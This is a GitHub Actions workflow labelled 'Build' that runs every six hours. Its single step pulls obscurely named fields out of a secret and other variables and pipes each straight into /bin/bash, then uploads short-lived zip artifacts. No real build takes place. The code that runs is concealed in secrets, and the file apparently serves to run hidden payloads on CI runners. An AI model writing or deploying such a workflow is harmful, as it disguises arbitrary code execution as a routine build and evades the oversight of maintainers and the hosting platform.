name: Build
on:
  workflow_dispatch:

  schedule:
    - cron: '34 5,11,17,23 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  runner:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: Go
        env:
          n23: ${{ secrets.n23 }}
        run: |
          printf '%s' "$n23" | jq -r .xsv7269 | /bin/bash
          printf '%s' "$z155" | jq -r .pdztz26935 | /bin/bash
          echo $puw2124 | jq -r .sdszt06 | /bin/bash
          printf '%s' "$ax77" | jq -r .smru3530 | /bin/bash
          printf '%s' "$hhq57" | jq -r .suh38879 | /bin/bash

      - name: Archive results
        uses: actions/upload-artifact@v4
        with:
          name: daicYYNa
          path: "*.zip"
          retention-days: 1
